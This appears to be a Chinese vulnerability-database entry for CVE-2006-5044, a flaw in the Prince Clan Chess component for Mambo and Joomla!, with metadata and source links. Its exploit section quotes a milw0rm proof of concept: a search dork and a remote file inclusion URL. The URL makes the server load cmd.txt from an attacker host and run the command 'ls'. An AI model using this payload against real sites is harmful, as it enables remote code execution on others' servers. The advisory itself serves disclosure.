Mambo和Joomla! Prince Clan Chess组件未明漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110673 漏洞类型 未知
发布时间 2006-07-24 更新时间 2006-09-27
CVE编号 CVE-2006-5044 CNNVD-ID CNNVD-200609-461
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2069
https://www.securityfocus.com/bid/84252
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-461
|漏洞详情
mambo是一个基于php+mysql的开放源码的网站内容管理系统(CMS),具有强大的功能、友好的后台管理界面。Joomla!是一套在国外相当知名的内容管理系统(ContentManagementSystem,CMS)。Mambo和Joomla!的PrinceClan(Princeclan)Chesscomponent(com_pcchess)0.8及更早版本中的未指定漏洞具有未指定的影响和攻击矢量。
|漏洞EXP
# pc_chess Component

- dork : index.php?option=com_pcchess

- exploit :

http://[target]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls 

# milw0rm.com [2006-07-24]
|受影响的产品
Mambo Prince Clan Chess Component 0.8 Joomla-addons.org Prince Clan Chess Component 0.8
|参考资料

来源:www.princeclan.org
链接:http://www.princeclan.org
来源:forum.joomla.org
链接:http://forum.joomla.org/index.php/topic,79477.0.html